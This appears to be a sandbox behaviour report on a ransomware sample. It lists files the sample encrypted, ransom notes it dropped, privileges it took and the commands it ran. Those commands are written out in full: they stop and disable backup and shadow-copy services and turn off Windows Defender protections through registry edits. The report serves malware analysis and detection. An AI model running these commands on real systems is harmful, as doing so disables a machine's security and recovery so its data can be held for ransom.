| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_qPenILcwkEc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8r8n7O2vh5I0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ot4-BRBpVOw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBENDF98.CHM.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tYNE5h156iE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ejDkUpNb-uE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6Xe4PVKgUZs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_CKOnfQsRD000.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_H8_ysH1OV5c0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_nOawPqpkPdI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_HJpgra2PKGw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_YZXiE3xprXI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_PoFgODea85Y0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_3oHjEzreFvY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_DD1FktKFpq40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGFJtpgVJ8Q0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tDatXFn3nMs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_wVoQVlsauuA0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8RTeLd2R-f40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_quaHYc52ueQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_14QF-F3brxE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGoscHH3fdE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ajgo8utBdCc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MOlglUL-oY40.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MwbOO68tbHo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_SYlWSGO4sU00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8DKzi95OH_Y0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_2TyluNyOAXs0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_E3nas5TA5u80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\GyDM_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_4IrIjFVxFd80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_NrLVH77nBoc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_lmfOb2-shGk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dwiuYnFxHdY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_l3ZfTuzQV9k0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dChs6bXxbhw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_9v9J0tGUQx00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_UUamuYI-GU80.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_1dQCooE08es0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
